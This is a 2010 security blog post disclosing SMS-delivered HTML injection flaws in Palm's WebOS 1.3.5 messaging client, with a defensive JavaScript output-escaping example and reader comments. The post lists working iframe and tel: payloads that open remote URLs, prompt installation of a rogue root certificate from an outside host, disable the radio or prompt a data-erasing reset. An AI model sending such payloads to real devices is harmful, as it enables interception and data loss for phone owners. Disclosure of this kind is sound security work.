Intrepidus Group
Insight

WebOS: Examples of SMS delivered injection flaws

Posted: April 16, 2010 – 2:59 pm | Filed under: Mobile Security

(Note: the findings herein affect WebOS 1.3.5. Palm has since released WebOS 1.4, which fixes these vulnerabilities, though not all handsets or carriers are running this version. Due to contractual agreements, the public disclosure of this information was delayed.)

Intrepidus Group has been doing mobile application security testing for over three years now, and during this time we’ve discovered and responsibly disclosed a number of vulnerabilities in Brew, Windows Mobile, BlackBerry, and iPhone applications. We have been contracted time after time to perform threat modeling, penetration testing, and various other security assessments on these platforms. So, as anyone would expect, we were all looking forward to getting a look at Palm’s new WebOS platform.

While closely following the blogosphere around WebOS and reading documents released by Palm, we started to understand the revolutionary paradigm shift that Palm was attempting with WebOS. A mobile platform that functions like a web browser; a platform whose applications are written in JavaScript and HTML; and an API reference so simple that anyone reasonably familiar with web application programming could create the next revolutionary social media app in no time.

When a customer shipped us our first PRE devices to test their application, we spent spare cycles exploring the rest of WebOS. Our initial impressions were quite positive. There was just so much to love: Linux underneath, the platform’s open nature, the user interface, and the hardware. However, the honeymoon ended abruptly once we started to explore WebOS’s security posture.

As we started to pry a little, it became quite apparent that Palm’s new WebOS platform was riddled with some pretty dangerous bugs. These bugs can all be traced back to the fact that WebOS is essentially a web browser and the applications are written in JavaScript and HTML. This also means that WebOS applications are subject to the numerous web application vulnerabilities that any seasoned penetration tester would be all too familiar with. We were also quite surprised at how quickly these vulnerabilities were discovered. Within a matter of hours we started to uncover a number of low-hanging-fruit vulnerabilities that would be considered quite dangerous under even the most forgiving of standards.

We understand, of course, that there are a number of competing interests that go into the development of a new mobile platform. There are demands from shareholders to get this product completed as quickly as possible. There are requirements from developers to make application development as easy as possible. There are requirements from manufacturers to make this product as cheap as possible. And there are requirements, by the (often not so popular) security oversight team, to make this product as safe as possible. We obviously do not expect Palm to focus on making the most secure of mobile platforms due to all of these competing interests. However, we feel that Palm put almost no thought into security during their development of WebOS. All of the low-hanging fruit discovered should have been identified in the most basic of threat models, which should have been performed during the very early development stages of WebOS, way before any code was written. If they were, then we would imagine that slight changes to the underlying architecture of WebOS could have been implemented to protect against common web application vulnerabilities that are found in WebOS applications. Or, at the very least, common web application vulnerabilities would not have surfaced in WebOS applications written by Palm themselves.

So what vulnerabilities are we talking about? What was uncovered after a few hours of poking around? The WebOS SMS client wasn’t performing input/output validation on any SMS messages sent to the handset. This led to a rudimentary HTML injection bug. Coupled with the fact that HTML injection leads directly to injecting code into a WebOS application, the attacks made possible were quite dangerous (especially considering they could all be delivered over an SMS message). We have produced a video demonstrating some of these possible attacks.

In this video a number of text messages were sent to the device. Leveraging the HTML injections, and some innate WebOS functionality, we were able to perform actions ranging from opening up a website by simply reading an SMS to turning off the handset’s radio. Below is a list of the text messages we sent as well as the action they performed.

Message: <iframe src='http://www.google.com'<>>
Action: Open the web browser and point it to google.com

Message: <iframe src='http://webos.ath.cx:50050/bad.doc'<>>
Action: Start downloading a file using the handset's full radio bandwidth

Message: <iframe src='http://www.archive.org/download/Peanut_Butter_Jelly_Time/pbj_512kb.mp4'<>>
Action: Start streaming a video from the internet

Message: <iframe src='http://rajweb.net/ubercert.crt'<>>
Action: Ask the user to install a new root CA certificate

Message: <iframe src='tel:#*#633#'<>>
Action: Turn off the handset’s radio

Message: <iframe src='tel:#*#3366#'<>>
Action: Ask the user to enter “demo” mode, erasing all personal data on the device

This demonstration focuses only on the SMS client of WebOS. The HTML injection bug may be present in a number of WebOS applications. Any app installed via the marketplace (even other Palm-developed apps) may be vulnerable to this or other common web application vulnerabilities. We hope that by seeing these attacks in action, WebOS application developers will know what kind of defenses they must code into their applications. We hope that by raising awareness of this threat, users will be aware of the dangers their WebOS applications can present, and that product managers will insist on security assurance testing before their offering goes live.
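The missing output validation described above, as an added example that is not Palm's code or code from the original post: a message view that concatenates the SMS body into markup, beside the same view with the body HTML-encoded first. The function names, the markup layout and the sender number are hypothetical; the sample body is the first test message listed above.

```javascript
// Added illustration; renderMessageUnsafe/renderMessageSafe are hypothetical
// names, not WebOS APIs.
const HTML_ESCAPES = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;"
};

// Encode every character that can open a tag, an entity or an attribute value.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// "Before": untrusted sender and body are dropped into the markup unchanged,
// so any tag in the SMS becomes part of the application's own page.
function renderMessageUnsafe(sender, body) {
  return '<div class="msg"><span class="from">' + sender +
         '</span><p>' + body + '</p></div>';
}

// "After": both untrusted fields are encoded at the point of output.
function renderMessageSafe(sender, body) {
  return '<div class="msg"><span class="from">' + escapeHtml(sender) +
         '</span><p>' + escapeHtml(body) + '</p></div>';
}

// Lists the element start tags an HTML parser would see in a fragment.
// Useful as a regression check: a rendered message should only ever
// contain the tags the template itself emits.
function tagNames(html) {
  const names = [];
  const re = /<([a-zA-Z][a-zA-Z0-9]*)/g;
  let m;
  while ((m = re.exec(html)) !== null) {
    names.push(m[1].toLowerCase());
  }
  return names;
}

// Constructed sender; body taken from the list of test messages above.
const SAMPLE_SENDER = "+15555550100";
const SAMPLE_BODY = "<iframe src='http://www.google.com'<>>";

console.log(tagNames(renderMessageUnsafe(SAMPLE_SENDER, SAMPLE_BODY)));
console.log(tagNames(renderMessageSafe(SAMPLE_SENDER, SAMPLE_BODY)));
```

Encoding at output keeps the message readable as literal text while ensuring the view only ever contains the template's own elements.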


22 Comments

  1. subzero
    Posted April 16, 2010 at 4:53 pm | Permalink

    This is BS. You tested a ver 1.3.5 when Palm has already rolled out 1.4? Welcome to 2010.

  2. Mike
    Posted April 17, 2010 at 4:56 am | Permalink

    What version of webOS was this Pre you tested? Should I get a version of Windows XP with no service packs and run some exploits on that too?

  3. Tommy
    Posted April 17, 2010 at 5:03 am | Permalink

    Thank you for making my WebOS handset more secure and for your responsible disclosure.

  4. Posted April 18, 2010 at 4:10 pm | Permalink

    1.) It's mentioned in the video. 2.) You could try that but we are betting you would not be successful. k thx!

  5. Posted April 18, 2010 at 4:15 pm | Permalink

    are you running 1.4 and can we have your phone number?

  6. insopalm
    Posted April 18, 2010 at 5:17 pm | Permalink

    Cheers to you, Intrepidus group. I can only imagine how painful it was to withhold your 1.3.5 security findings while Palm hastily put together the 1.4 release to fix these immediate issues. How disappointing of Palm, I look forward to hearing about what has been fixed and if a responsible smartphone user is relatively safe using a WebOS device.

  7. olle
    Posted April 19, 2010 at 1:23 am | Permalink

    If iframe is possible a script tag should perhaps be possible too, this would give the attacker full access to the Palm SDK, probably with privileges of the running app. And since the sms app is most likely running in the com.palm namespace, access to the SDK with high privileges. Jikes.

  8. Someone else
    Posted April 19, 2010 at 5:32 pm | Permalink

    The possibilities for Rickrolling are endless!

  9. subzero
    Posted April 19, 2010 at 6:22 pm | Permalink

    Actually like "Tommy" said below. Thanks for making WebOS safer.

  10. Posted April 19, 2010 at 1:40 pm | Permalink

    Why isn’t the WebOS version mentioned in this article? No matter how “responsible” you might’ve been in reporting this exploit, leaving out that vital bit of information (that this vulnerability was patched and fixed MONTHS ago) is beyond irresponsible: it’s actively malicious. Please update this article.

  11. Posted April 19, 2010 at 6:52 pm | Permalink

    I love that people are showing up here to complain that Intrepidus responsibly disclosed the flaw and got their handsets patched before telling the world. Imagine screaming at an auto mechanic for pre-fixing your Toyota accelerator at no charge. "See, it doesn't work! I'm still alive!"
    P.S. Even better is the claim that you're actively exploiting handsets by not posting revision numbers. If ignorance were currency, this place would be a gold mine.

  12. Posted April 19, 2010 at 6:54 pm | Permalink

    @Newbs: fair point. We didn't mean for it ("leaving out" the version info) to come across in that manner; we were really erring on the hope that people would watch the video. While your rationale ("actively malicious") is a *bit* much, the article will get updated. Thanks for the heads up.

  13. Posted April 19, 2010 at 7:17 pm | Permalink

    *yawn* Yeah an application without input validation sure is an indication of inherent flawed security of the browser-based application model in general and the WebOS API in specific.

  14. Posted April 19, 2010 at 7:40 pm | Permalink

    Don't shoot the messenger. Nonetheless good examples, hopefully this brings some more awareness to attacks on wireless devices that utilize web applications. Good job.

  15. subzero
    Posted April 20, 2010 at 12:19 am | Permalink

    Sprint and Verizon both have been updated from 1.3.5 to 1.4 (1.4.1 for Sprint)

  16. Posted April 20, 2010 at 10:41 pm | Permalink

    Wow, calling 1.4 "hastily" put together is rather ignorant…

  17. Posted April 21, 2010 at 12:32 am | Permalink

    For sure ! You tell us who said that and we'll put them on our ignorant list!

  18. Posted April 22, 2010 at 4:23 pm | Permalink

    That would be "insopalm" in the comment directly above mine. You guys aren't really impressing me at all.

  19. insopalm
    Posted April 22, 2010 at 5:16 pm | Permalink

    If they didn't "hastily" put together 1.4, then Palm did their entire user community a massive disservice. Lord knows the scope and scale of fixes necessary to resolve this sort of issue – the concept that the entire phone runs as an HTML browser leaves it incredibly vulnerable to HTML injection of all sorts since Palm obviously didn't architect safeguards in their WebOS – means it wasn't enough just to do a little safecheck on SMS messages to fix everything in 1.4. This type of issue goes far deeper – a couple months of development for a patch is NOT enough time to re-architect an entire system with security that was never considered, while ensuring backwards compatibility. I can imagine it would be incredibly easy for the folks at Intrepidus to blow up your 1.4 device now that they understand the holes in the WebOS security architecture (or lack thereof). Point is, WebOS as a whole was obviously rushed to market and hastily put together. It's sad because it's a revolutionary concept, but there's a reason why nobody else has gone in that direction….

  20. insopalm
    Posted April 22, 2010 at 5:29 pm | Permalink

    You obviously are not a member of the sarcasm police.

